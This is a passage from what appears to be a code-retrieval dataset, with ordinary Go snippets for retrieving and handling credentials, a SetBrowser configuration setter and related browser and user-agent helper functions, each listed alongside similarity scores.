json.NewEncoder(buffer).Encode(Credentials{\n\t\tServerURL: serverURL,\n\t\tUsername: username,\n\t\tSecret: secret,\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, _ = fmt.Fprint(writer, buffer.String())\n\treturn nil\n}", "func (r *Request) BasicAuthCredentials() (string, string, bool) {\n\treturn r.BasicAuth()\n}", "func (p *TempCredentialsProvider) getCredsWithRole() (credentials.Value, error) {\n\tlog.Println(\"Getting credentials with AssumeRole\")\n\n\tif p.config.RoleARN == \"\" {\n\t\treturn credentials.Value{}, errors.New(\"No role defined\")\n\t}\n\n\trole, err := p.assumeRoleFromCreds(p.masterCreds, true)\n\tif err != nil {\n\t\treturn credentials.Value{}, err\n\t}\n\n\tp.SetExpiration(*role.Expiration, DefaultExpirationWindow)\n\n\tlog.Printf(\"Using role %s, expires in %s\", formatKeyForDisplay(*role.AccessKeyId), time.Until(*role.Expiration).String())\n\treturn credentials.Value{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t}, nil\n}", "func getCredentials(env storageEnvironment) (map[string]string, error) {\n\tcredentials := map[string]string{}\n\tswitch env {\n\tcase emulator:\n\t\treturn map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": storage.StorageEmulatorAccountName,\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": storage.StorageEmulatorAccountKey}, nil\n\tcase account:\n\t\tcredentials = map[string]string{\n\t\t\t\"AZURE_STORAGE_ACCOUNT_NAME\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_NAME\"),\n\t\t\t\"AZURE_STORAGE_ACCOUNT_KEY\": os.Getenv(\"AZURE_STORAGE_ACCOUNT_KEY\")}\n\t\tif err := checkEnvVar(&credentials); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\treturn credentials, nil\n}", "func (RequestAuthenticationToken *TRequestAuthenticationToken) GetCredential() string {\n\treturn \"\"\n}", "func (db DatabaseConfig) Credentials() string {\n\t// TODO Different credentials for different drivers\n\treturn fmt.Sprintf(\n\t\t\"host=%s port=%d dbname=%s user=%s password=%s\",\n\t\tdb.Host,\n\t\tdb.Port,\n\t\tdb.Name,\n\t\tdb.User,\n\t\tdb.Password,\n\t)\n}", "func (s *Synthetics) GetSecureCredentials() ([]*SecureCredential, error) {\n\treturn s.GetSecureCredentialsWithContext(context.Background())\n}", "func (p DirectHandler) getCredentials(w http.ResponseWriter, r *http.Request) (credentials, error) {\n\n\t// GET /something?user=name&passwd=xyz&aud=bar\n\tif r.Method == \"GET\" {\n\t\treturn credentials{\n\t\t\tUser: r.URL.Query().Get(\"user\"),\n\t\t\tPassword: r.URL.Query().Get(\"passwd\"),\n\t\t\tAudience: r.URL.Query().Get(\"aud\"),\n\t\t}, nil\n\t}\n\n\tif r.Method != \"POST\" {\n\t\treturn credentials{}, fmt.Errorf(\"method %s not supported\", r.Method)\n\t}\n\n\tif r.Body != nil {\n\t\tr.Body = http.MaxBytesReader(w, r.Body, MaxHTTPBodySize)\n\t}\n\tcontentType := r.Header.Get(\"Content-Type\")\n\tif contentType != \"\" {\n\t\tmt, _, err := mime.ParseMediaType(r.Header.Get(\"Content-Type\"))\n\t\tif err != nil {\n\t\t\treturn credentials{}, err\n\t\t}\n\t\tcontentType = mt\n\t}\n\n\t// POST with json body\n\tif contentType == \"application/json\" {\n\t\tvar creds credentials\n\t\tif err := json.NewDecoder(r.Body).Decode(&creds); err != nil {\n\t\t\treturn credentials{}, fmt.Errorf(\"failed to parse request body: %w\", err)\n\t\t}\n\t\treturn creds, nil\n\t}\n\n\t// POST with form\n\tif err := r.ParseForm(); err != nil {\n\t\treturn credentials{}, fmt.Errorf(\"failed to parse request: %w\", err)\n\t}\n\n\treturn credentials{\n\t\tUser: r.Form.Get(\"user\"),\n\t\tPassword: r.Form.Get(\"passwd\"),\n\t\tAudience: r.Form.Get(\"aud\"),\n\t}, nil\n}", "func (b *Base) GetDefaultCredentials() *Credentials {\n\tb.API.credMu.RLock()\n\tdefer b.API.credMu.RUnlock()\n\tif b.API.credentials == nil {\n\t\treturn nil\n\t}\n\tcreds := *b.API.credentials\n\treturn &creds\n}", "func TransportCredentials() *credentials.TransportCredentials {\n\treturn transportCredentials\n}", "func New() *Credentials {\n\tc := Credentials{}\n\tc.whitelist = make(map[string]struct{}, 1)\n\treturn &c\n}", "func (a *Client) GetClusterCredentials(params *GetClusterCredentialsParams, authInfo runtime.ClientAuthInfoWriter) (*GetClusterCredentialsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewGetClusterCredentialsParams()\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"GetClusterCredentials\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/api/v1/clusters/{name}/credentials\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &GetClusterCredentialsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn result.(*GetClusterCredentialsOK), nil\n\n}", "func credentials() (username string, password string) {\n\treader := bufio.NewReader(os.Stdin)\n\n\tif asUser != \"\" {\n\t\tusername = asUser\n\t} else {\n\t\tif currentUser, err := user.Current(); err == nil {\n\t\t\tif testPassword {\n\t\t\t\tusername = \"test1\"\n\t\t\t} else {\n\t\t\t\tusername = currentUser.Username\n\t\t\t\tlog.Info(\"Current username: \" + username)\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Print(\"Enter Username: \")\n\t\t\tusername, _ = reader.ReadString('\\n')\n\t\t}\n\t}\n\tlog.Info(\"Connecting with username: \" + username)\n\n\tif testPassword {\n\t\tpassword = \"password\"\n\t} else {\n\t\tif withPassword != \"\" {\n\t\t\tpassword = withPassword\n\t\t} else if passwdFromEnv {\n\t\t\tpassword = os.Getenv(\"$VAULT_SSH_PWD\")\n\t\t} else {\n\t\t\tfmt.Print(\"Enter Password: \")\n\t\t\tbytePassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to read password\")\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t\tfmt.Println()\n\t\t\tpassword = string(bytePassword)\n\t\t}\n\t}\n\n\treturn strings.TrimSpace(username), strings.TrimSpace(password)\n}", "func (p *AssumeRoleProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\trole, err := p.RetrieveStsCredentials(ctx)\n\tif err != nil {\n\t\treturn aws.Credentials{}, err\n\t}\n\n\treturn aws.Credentials{\n\t\tAccessKeyID: *role.AccessKeyId,\n\t\tSecretAccessKey: *role.SecretAccessKey,\n\t\tSessionToken: *role.SessionToken,\n\t\tCanExpire: true,\n\t\tExpires: *role.Expiration,\n\t}, nil\n}", "func (m *Application) GetKeyCredentials()([]KeyCredentialable) {\n return m.keyCredentials\n}", "func AccessCredentials(token string) credentials.PerRPCCredentials {\n\treturn creds{payload: token, security: access}\n}", "func (ec *ExtensionClient) ListCredentials(extensionID, serviceID string) (res []*extension.ExtensionCredentials, err error) {\n\trequest, err := extensionc.BuildListCredentialsPayload(extensionID, serviceID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse, err := ec.c.ListCredentials()(context.Background(), request)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn response.([]*extension.ExtensionCredentials), nil\n}", "func getCreds() (string, string) {\n\tvar username string\n\tfmt.Print(\"Username: \")\n\tfmt.Scanln(&username)\n\tfmt.Print(\"Password: \")\n\tpassword, err := terminal.ReadPassword(int(syscall.Stdin))\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tfmt.Println(\"\")\n\treturn username, string(password)\n}", "func (c *stsCredentialsCache) getStsCredentials(accessor Accessor) (*credentials.Credentials, error) {\n\tif !c.expired() && c.credentials != nil {\n\t\treturn c.credentials, nil\n\t}\n\n\tperRPCCreds, err := accessor.Credentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tclient, err := newConn(accessor.IdentityProvider(), config.Env.Token, perRPCCreds)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer client.Close()\n\n\tbundle, err := client.refreshStsCredentials()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tstsToken := bundle.GetStsToken()\n\n\tawsCredentials := credentials.NewStaticCredentialsFromCreds(credentials.Value{\n\t\tAccessKeyID: stsToken.AccessKeyId,\n\t\tSecretAccessKey: stsToken.SecretAccessKey,\n\t\tSessionToken: stsToken.SessionToken,\n\t})\n\n\tc.add(stsToken.GetExpiration(), awsCredentials)\n\n\treturn awsCredentials, nil\n}", "func (m *MockCredentialGetter) GetCredentials(arg0 context.Context, arg1, arg2 string) ([]byte, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"GetCredentials\", arg0, arg1, arg2)\n\tret0, _ := ret[0].([]byte)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (config *Config) GetHttpCredentials() (string, string) {\n\tparts := strings.Split(config.HttpCredentials, \":\")\n\tif len(parts) < 2 {\n\t\treturn \"\", \"\"\n\t}\n\t// return everything from the first match and the rest\n\treturn parts[0], config.HttpCredentials[len(parts[0])+1:]\n}", "func CredentialsForSecret(secretName string, secretNamespace string, clientset kubernetes.Interface) (user string, password string, err error) {\n\tif secretName == \"\" {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, nil\n\t}\n\t// Try to get secret\n\tsecret, err := clientset.CoreV1().Secrets(secretNamespace).Get(secretName, metav1.GetOptions{})\n\tif err != nil {\n\t\tklog.Errorf(\"Could not get secret, error is %s\\n\", err)\n\t\treturn DefaultRPCUser, DefaultRPCPassword, err\n\t}\n\tdata, ok := secret.Data[UserKey]\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", UserKey)\n\t}\n\tuser = string(data)\n\tdata, ok = secret.Data[PasswordKey]\n\tpassword = string(data)\n\tif !ok {\n\t\treturn DefaultRPCUser, DefaultRPCPassword, fmt.Errorf(\"Secret does not contain key %s\", PasswordKey)\n\t}\n\treturn user, password, nil\n}", "func (om *Sdk) GetDirectorCredentials(credential string) (*SimpleCredential, error) {\n\treturn om.getCredential(fmt.Sprintf(\"api/v0/deployed/director/credentials/%s\", credential))\n}", "func (source *AWSSecretsManagerSource) Credentials() ([]Credentials, error) {\n\tclient := source.getClient()\n\n\tsecretIDs := []string{}\n\n\tif source.SecretPrefix != \"\" {\n\t\tif err := client.ListSecretsPages(&secretsmanager.ListSecretsInput{}, func(output *secretsmanager.ListSecretsOutput, lastPage bool) bool {\n\t\t\tfor _, secret := range output.SecretList {\n\t\t\t\tif strings.HasPrefix(*secret.Name, source.SecretPrefix) {\n\t\t\t\t\tsecretIDs = append(secretIDs, *secret.ARN)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn !lastPage\n\t\t}); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error listing secrets: %v\", err)\n\t\t}\n\n\t\tif len(secretIDs) == 0 {\n\t\t\treturn nil, fmt.Errorf(\"No secrets found with the '%s' prefix\", source.SecretPrefix)\n\t\t}\n\t} else if source.SecretID != \"\" {\n\t\tsecretIDs = append(secretIDs, source.SecretID)\n\t}\n\n\tcredentials := []Credentials{}\n\tfor _, secretID := range secretIDs {\n\t\tvalue, err := client.GetSecretValue(&secretsmanager.GetSecretValueInput{\n\t\t\tSecretId: aws.String(secretID),\n\t\t})\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while fetching secret %s: %v\", secretID, err)\n\t\t}\n\t\tfetchedCredentials, err := getCredentialsFromBytes([]byte(*value.SecretString))\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Error while parsing credentials from secret %s: %v\", secretID, err)\n\t\t}\n\t\tcredentials = append(credentials, fetchedCredentials...)\n\t}\n\n\treturn credentials, nil\n}", "func (svc *credentialService) Get(ctx context.Context, email string) (model.Credential, error) {\n\tcred, err := svc.repo.Get(ctx, email)\n\tif err == repo.ErrNotFound {\n\t\t//user not found, cannot login\n\t\treturn cred, service.ErrNotFound\n\t}\n\n\treturn cred, err\n}", "func (p *clientCredentialsSource) ClientCredentials() (*ClientCredentials, error) {\n\tid, err := readFileContent(path.Join(p.path, fmt.Sprintf(\"%s-client-id\", p.name)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsecret, err := readFileContent(path.Join(p.path, fmt.Sprintf(\"%s-client-secret\", p.name)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &ClientCredentials{\n\t\tID: id,\n\t\tSecret: secret,\n\t}, nil\n}", "func NewCredentials(service string) tushle.Credentials {\n\treturn &creds{\n\t\tservice: service,\n\t}\n}", "func (store *CredStore) GetCred(path string) []byte {\n\treturn store.Cred[path]\n}", "func getDefaultCredentials() *credentials.Credentials {\n\tfileCreds := credentials.FromFile()\n\tif fileCreds != nil {\n\t\treturn fileCreds\n\t}\n\n\tenvCreds := credentials.FromEnv()\n\tif envCreds != nil {\n\t\treturn envCreds\n\t}\n\treturn &credentials.Credentials{}\n}", "func getAWSCredentials(keychainName string, keychainProfile string) (*credentials.Credentials, error) {\n\n\t// Open the keyring which holds the credentials\n\tring, _ := keyring.Open(keyring.Config{\n\t\tServiceName: \"aws-vault\",\n\t\tAllowedBackends: []keyring.BackendType{keyring.KeychainBackend},\n\t\tKeychainName: keychainName,\n\t\tKeychainTrustApplication: true,\n\t})\n\n\t// Prepare options for the vault before creating the provider\n\tvConfig, err := vault.LoadConfigFromEnv()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to load AWS config from environment\")\n\t}\n\tvOptions := vault.VaultOptions{\n\t\tConfig: vConfig,\n\t\tMfaPrompt: prompt.Method(\"terminal\"),\n\t}\n\tvOptions = vOptions.ApplyDefaults()\n\terr = vOptions.Validate()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to validate aws-vault options\")\n\t}\n\n\t// Get a new provider to retrieve the credentials\n\tprovider, err := vault.NewVaultProvider(ring, keychainProfile, vOptions)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to create aws-vault provider\")\n\t}\n\tcredVals, err := provider.Retrieve()\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"Unable to retrieve aws credentials from aws-vault\")\n\t}\n\treturn credentials.NewStaticCredentialsFromCreds(credVals), nil\n}", "func (settings EnvironmentSettings) GetClientCredentials() (ClientCredentialsConfig, error) {\n\tsecret := settings.Values[ClientSecret]\n\tif secret == \"\" {\n\t\tlogger.Instance.Writeln(logger.LogInfo, \"EnvironmentSettings.GetClientCredentials() missing client secret\")\n\t\treturn ClientCredentialsConfig{}, errors.New(\"missing client secret\")\n\t}\n\tclientID, tenantID := settings.getClientAndTenant()\n\tconfig := NewClientCredentialsConfig(clientID, secret, tenantID)\n\tconfig.AADEndpoint = settings.Environment.ActiveDirectoryEndpoint\n\tconfig.Resource = settings.Values[Resource]\n\tif auxTenants, ok := settings.Values[AuxiliaryTenantIDs]; ok {\n\t\tconfig.AuxTenants = strings.Split(auxTenants, \";\")\n\t\tfor i := range config.AuxTenants {\n\t\t\tconfig.AuxTenants[i] = strings.TrimSpace(config.AuxTenants[i])\n\t\t}\n\t}\n\treturn config, nil\n}", "func (m *MockKubernetesService) GetCredentials(clusterID string) (*do.KubernetesClusterCredentials, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"GetCredentials\", clusterID)\n\tret0, _ := ret[0].(*do.KubernetesClusterCredentials)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func cCredentials(u UserCredentials) UserCredentials {\n\treturn UserCredentials{Email: u.Email, Password: u.Password}\n}", "func NewCredentials(build build.Build) Credentials {\n\treturn Credentials{build.Buildpack, build.Layers.HelperLayer(\"google-stackdriver-credentials\", \"Google Stackdriver Credentials\")}\n}", "func (c *ClientCredsCache) Get(region string) (*types.ClientCreds, error) {\n\tkey := getClientCredsFilename(region)\n\tcacheFile := filepath.Join(defaultCacheLocation(), key)\n\n\tvar clientCreds *types.ClientCreds\n\n\tif _, err := os.Stat(cacheFile); os.IsNotExist(err) {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\tdata, err := ioutil.ReadFile(cacheFile)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\terr = json.Unmarshal(data, &clientCreds)\n\tif err != nil {\n\t\treturn &types.ClientCreds{}, err\n\t}\n\n\treturn clientCreds, nil\n}", "func (p *SessionTokenProvider) Retrieve(ctx context.Context) (aws.Credentials, error) {\n\tvar err error\n\tcreds := p.CheckCache()\n\n\tif creds == nil || creds.Value().Expired() {\n\t\tp.Logger.Debugf(\"Detected expired or unset session token credentials, refreshing\")\n\t\tcreds, err = p.retrieve(ctx)\n\t\tif err != nil {\n\t\t\treturn aws.Credentials{}, err\n\t\t}\n\n\t\tif p.Cache != nil {\n\t\t\tif err = p.Cache.Store(creds); err != nil {\n\t\t\t\tp.Logger.Debugf(\"error caching credentials: %v\", err)\n\t\t\t}\n\t\t}\n\t}\n\n\t// afaik, this can never happen\n\t// if creds == nil {\n\t//\t// something's wacky, expire existing provider creds, and retry\n\t//\tp.SetExpiration(time.Unix(0, 0), 0)\n\t//\treturn p.Retrieve()\n\t// }\n\n\tv := creds.Value()\n\tv.Source = SessionTokenProviderName\n\n\tp.Logger.Debugf(\"SESSION TOKEN CREDENTIALS: %+v\", v)\n\treturn v, nil\n}" ]
[ "0.82303035", "0.7841024", "0.76808125", "0.7602995", "0.75996184", "0.74585074", "0.7434118", "0.73599946", "0.7357788", "0.73341274", "0.7289662", "0.7288641", "0.7255966", "0.7176546", "0.7145936", "0.7091499", "0.70872587", "0.70598394", "0.7058662", "0.70557296", "0.70268774", "0.6969246", "0.6849835", "0.68385136", "0.6822007", "0.6742293", "0.6703539", "0.6676863", "0.6656979", "0.66251415", "0.6605071", "0.6601595", "0.65370387", "0.6479912", "0.6441515", "0.64356834", "0.6430601", "0.6421962", "0.641556", "0.63669", "0.63636863", "0.6359626", "0.63587946", "0.6357037", "0.634635", "0.6315644", "0.62814224", "0.62793773", "0.6275255", "0.62692034", "0.6266259", "0.6253308", "0.6248926", "0.6194891", "0.61403155", "0.6123759", "0.6120761", "0.61135185", "0.6112402", "0.61076254", "0.60991037", "0.60922235", "0.60829943", "0.60610837", "0.60527396", "0.60465115", "0.6038053", "0.6023137", "0.60055286", "0.5985859", "0.59854734", "0.59758294", "0.59631056", "0.5962777", "0.59526324", "0.5952311", "0.5943641", "0.5939044", "0.5939014", "0.59283227", "0.5923012", "0.59118134", "0.5905458", "0.5889592", "0.58754003", "0.5865126", "0.5860499", "0.58575946", "0.5846276", "0.5836653", "0.5832468", "0.58174723", "0.58057815", "0.58022565", "0.5797256", "0.5795788", "0.5794192", "0.5792897", "0.5783627", "0.57802725" ]
0.64140064
39
SetBrowser set if browser is enabled.
func (s *serverConfigV14) SetBrowser(v string) { serverConfigMu.Lock() defer serverConfigMu.Unlock() // Set browser param s.Browser = v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (m *UserSimulationEventInfo) SetBrowser(value *string)() {\n m.browser = value\n}", "func (m *IosiPadOSWebClip) SetUseManagedBrowser(value *bool)() {\n err := m.GetBackingStore().Set(\"useManagedBrowser\", value)\n if err != nil {\n panic(err)\n }\n}", "func (s *Portal) SetBrowserType(v string) *Portal {\n\ts.BrowserType = &v\n\treturn s\n}", "func (s *PortalSummary) SetBrowserType(v string) *PortalSummary {\n\ts.BrowserType = &v\n\treturn s\n}", "func (env *Env) OpenBrowser(url string) error {\n\tif err := browser.OpenURL(url); err != nil {\n\t\treturn xerrors.Errorf(\"could not open the browser: %w\", err)\n\t}\n\treturn nil\n}", "func CanOpenBrowser() bool {\n\tif runtime.GOOS == \"windows\" || runtime.GOOS == \"darwin\" {\n\t\treturn true\n\t}\n\n\toutput, err := execCommand(\"xdg-settings\", \"get\", \"default-web-browser\").Output()\n\n\tif err != nil {\n\t\treturn false\n\t}\n\n\tif string(output) == \"\" {\n\t\treturn false\n\t}\n\n\treturn true\n}", "func OpenBrowser(url string) {\n\tif !strings.HasPrefix(url, \"http\") {\n\t\turl = \"http://\" + url\n\t}\n\n\tDefaultRunner.Run(cmdOpenBrowser[0], url)\n}", "func (s serverConfigV14) GetBrowser() string {\n\tserverConfigMu.RLock()\n\tdefer serverConfigMu.RUnlock()\n\n\treturn s.Browser\n}", "func Browser(url string) error {\n\tvar err error\n\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\terr = execCommand(\"xdg-open\", url).Start()\n\tcase \"windows\":\n\t\terr = execCommand(\"rundll32\", \"url.dll,FileProtocolHandler\", url).Start()\n\tcase \"darwin\":\n\t\terr = execCommand(\"open\", url).Start()\n\tdefault:\n\t\terr = fmt.Errorf(\"unsupported platform\")\n\t}\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (s *Spider) StartBrowser(delay time.Duration, timeout time.Duration) {\n\tcount := scheduler.CountUrl()\n\tfor i := 0; i <= count; i++ {\n\t\tif url := scheduler.PopUrl(); url != \"\" {\n\t\t\tdownloader := downloader.Download{Delay: delay, Timeout: timeout}\n\t\t\tresp, err := downloader.Get(url)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tdefer resp.Body.Close()\n\n\t\t\tdoc, err := goquery.NewDocumentFromReader(resp.Body)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tdoc.Find(\"td.useragent a\").Each(func(i int, selection *goquery.Selection) {\n\t\t\t\tif value := selection.Text(); value != \"\" {\n\t\t\t\t\tuseragent.UA.Set(urlAttributeResults[url].Category, value)\n\t\t\t\t}\n\t\t\t})\n\t\t}\n\t}\n}", "func (m *Application) SetWeb(value WebApplicationable)() {\n m.web = value\n}", "func OptOpenBrowser(open bool) Opt {\n\treturn func(app *App) {\n\t\tapp.openBrowser = open\n\t}\n}", "func (r AuthenticationMethodsReferences) ChannelBrowser() bool {\n\treturn r.UsernameAndPassword || r.TOTP || r.WebAuthn\n}", "func (r *Relwarc) NewBrowser() *Browser {\n\tctx, cancel := chromedp.NewContext(r.ctx)\n\n\t// make sure a browser and its first tab are created.\n\tif err := chromedp.Run(ctx); err != nil {\n\t\tpanic(err)\n\t}\n\n\t// enable network by default.\n\tif err := chromedp.Run(ctx, network.Enable()); err != nil {\n\t\tpanic(err)\n\t}\n\n\ttgt := chromedp.FromContext(ctx).Target\n\n\ttab := Tab{\n\t\tctx: ctx,\n\t\tcancel: cancel,\n\t\ttarget: tgt,\n\t\trequestMap: map[network.RequestID]*Request{},\n\t}\n\n\tchromedp.ListenTarget(ctx, tab.onTargetEvent)\n\n\tbrowser := Browser{\n\t\tctx: ctx,\n\t\tfirst: &tab,\n\t\ttabs: map[target.ID]*Tab{},\n\t}\n\n\treturn &browser\n}", "func (socket *MockSocket) Browser() *socket.BrowserProtocol {\n\treturn socket.browser\n}", "func (b *OGame) SetUserAgent(newUserAgent string) {\n\tb.client.SetUserAgent(newUserAgent)\n}", "func (b Builders) needsBrowser() bool {\n\tfor _, v := range b {\n\t\tif v.BrowserBuild {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func SetHTTPUserAgent(agent string) error {\n\tif agent == \"\" {\n\t\treturn errUserAgentInvalid\n\t}\n\tm.Lock()\n\t_HTTPUserAgent = agent\n\tm.Unlock()\n\treturn nil\n}", "func (m *IosiPadOSWebClip) GetUseManagedBrowser()(*bool) {\n val, err := m.GetBackingStore().Get(\"useManagedBrowser\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*bool)\n }\n return nil\n}", "func (a *App) openbrowser(url string) {\n\tvar err error\n\tif runtime.GOOS == \"windows\" {\n\t\terr = exec.Command(\"rundll32\", \"url.dll,FileProtocolHandler\", url).Start()\n\t}\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (s *GetBrowserSettingsOutput) SetBrowserSettings(v *BrowserSettings) *GetBrowserSettingsOutput {\n\ts.BrowserSettings = v\n\treturn s\n}", "func (m *UserSimulationEventInfo) GetBrowser()(*string) {\n return m.browser\n}", "func (m *BrowserSiteList) SetStatus(value *BrowserSiteListStatus)() {\n err := m.GetBackingStore().Set(\"status\", value)\n if err != nil {\n panic(err)\n }\n}", "func (s *ListBrowserSettingsOutput) SetBrowserSettings(v []*BrowserSettingsSummary) *ListBrowserSettingsOutput {\n\ts.BrowserSettings = v\n\treturn s\n}", "func (s *UpdateBrowserSettingsOutput) SetBrowserSettings(v *BrowserSettings) *UpdateBrowserSettingsOutput {\n\ts.BrowserSettings = v\n\treturn s\n}", "func openURLInBrowser(url string, browserPath string) {\n\t// Cannot open URL if browser not found\n\tif browserPath == \"\" {\n\t\tlog.Println(\"[-] Browser not found to open URL: \", url)\n\t} else {\n\t\tcmdToExec := fmt.Sprintf(\"\\\"%s\\\" '%s' 2>/dev/null 1>/dev/null &\",\n\t\t\tbrowserPath, url)\n\t\teCmd([]string{cmdToExec}, \"\")\n\t}\n\n}", "func (gauo *GithubAssetUpdateOne) SetBrowserDownloadURL(s string) *GithubAssetUpdateOne {\n\tgauo.mutation.SetBrowserDownloadURL(s)\n\treturn gauo\n}", "func (gau *GithubAssetUpdate) SetBrowserDownloadURL(s string) *GithubAssetUpdate {\n\tgau.mutation.SetBrowserDownloadURL(s)\n\treturn gau\n}", "func (win *Window) SetAcceptFocus(setting bool) {\n\twin.Candy().Guify(\"gtk_window_set_accept_focus\", win, setting)\n}", "func openBrowser(url string) {\n\tvar err error\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\terr = exec.Command(\"xdg-open\", url).Start()\n\tcase \"windows\":\n\t\terr = exec.Command(\"rundll32\", \"url.dll,FileProtocolHandler\", url).Start()\n\tcase \"darwin\":\n\t\terr = exec.Command(\"open\", url).Start()\n\tdefault:\n\t\terr = fmt.Errorf(\"unsupported platform\")\n\t}\n\tmust(err)\n}", "func (m *GroupPolicyDefinition) SetSupportedOn(value *string)() {\n err := m.GetBackingStore().Set(\"supportedOn\", value)\n if err != nil {\n panic(err)\n }\n}", "func openBrowser(url string) error {\n\n\tvar cmd string\n\tvar args []string\n\n\tswitch runtime.GOOS {\n\tcase \"windows\":\n\t\tcmd = \"cmd\"\n\t\targs = []string{\"/c\", \"start\"}\n\tcase \"darwin\":\n\t\tcmd = \"open\"\n\tdefault: // \"linux\", \"freebsd\", \"openbsd\", \"netbsd\"\n\t\tcmd = \"xdg-open\"\n\t}\n\targs = append(args, url)\n\terr := exec.Command(cmd, args...).Start()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"error opening browser cmd:%s args:%s error: %w\", cmd, args, err)\n\t}\n\treturn nil\n}", "func (p *Page) MustSetUserAgent(req *proto.NetworkSetUserAgentOverride) *Page {\n\tp.e(p.SetUserAgent(req))\n\treturn p\n}", "func (m *WindowsUniversalAppX) SetMinimumSupportedOperatingSystem(value WindowsMinimumOperatingSystemable)() {\n m.minimumSupportedOperatingSystem = value\n}", "func openbrowser(url string) {\n\tvar err error\n\n\tswitch runtime.GOOS {\n\tcase \"linux\":\n\t\terr = exec.Command(\"xdg-open\", url).Start()\n\tcase \"windows\":\n\t\terr = exec.Command(\"rundll32\", \"url.dll,FileProtocolHandler\", url).Start()\n\tcase \"darwin\":\n\t\terr = exec.Command(\"open\", url).Start()\n\tdefault:\n\t\terr = fmt.Errorf(\"unsupported platform\")\n\t}\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (v *DefaultVersion) SetCapability(cap *Capability, b bool) {\n\tv.capabilities[cap] = b\n}", "func (r *Router) BrowserAvail() bool {\n\t// this is really just so otehr packages don't have to import `js` just to figure out if they should do extra browser setup\n\treturn js.Global().Truthy()\n}", "func SetForTests(c Capabilities) {\n\tcapInstance.lock.Lock()\n\tdefer capInstance.lock.Unlock()\n\tcapInstance.capabilities = &c\n}", "func (launcher *Launcher) setProcess(proc *os.Process) {\n\tlauncher.Mutex.Lock()\n\tlauncher.process = proc\n\tlauncher.Mutex.Unlock()\n}", "func (c *CmdReal) SetProcess(process *os.Process) {\n\tc.cmd.Process = process\n}", "func (m *Main) SetView(view webview.WebView) {\n\tm.w = view\n}", "func SetContext(contxt context.Context) {\n\tctx = contxt\n\ts, ok := ctx.Value(ContextKeyUserAgent).(string)\n\tif ok {\n\t\tuserAgent = s\n\t}\n}", "func (s *Settings) SetUserAgentWithApplicationDetails(appName, appVersion string) {\n\tC.webkit_settings_set_user_agent_with_application_details(s.settings, (*C.gchar)(C.CString(appName)), (*C.gchar)(C.CString(appVersion)))\n}", "func SetTest() {\n\tgin.SetMode(gin.TestMode)\n}", "func (m *AndroidLobApp) SetMinimumSupportedOperatingSystem(value AndroidMinimumOperatingSystemable)() {\n err := m.GetBackingStore().Set(\"minimumSupportedOperatingSystem\", value)\n if err != nil {\n panic(err)\n }\n}", "func (self *TextView) SetAcceptsTab(acceptsTab bool) {\n\tb := gobject.GBool(acceptsTab)\n\tdefer b.Free()\n\tC.gtk_text_view_set_accepts_tab(self.object, *((*C.gboolean)(b.GetPtr())))\n}", "func SetBackend(b Backend) {\n\tcurrentBackend = b\n}", "func 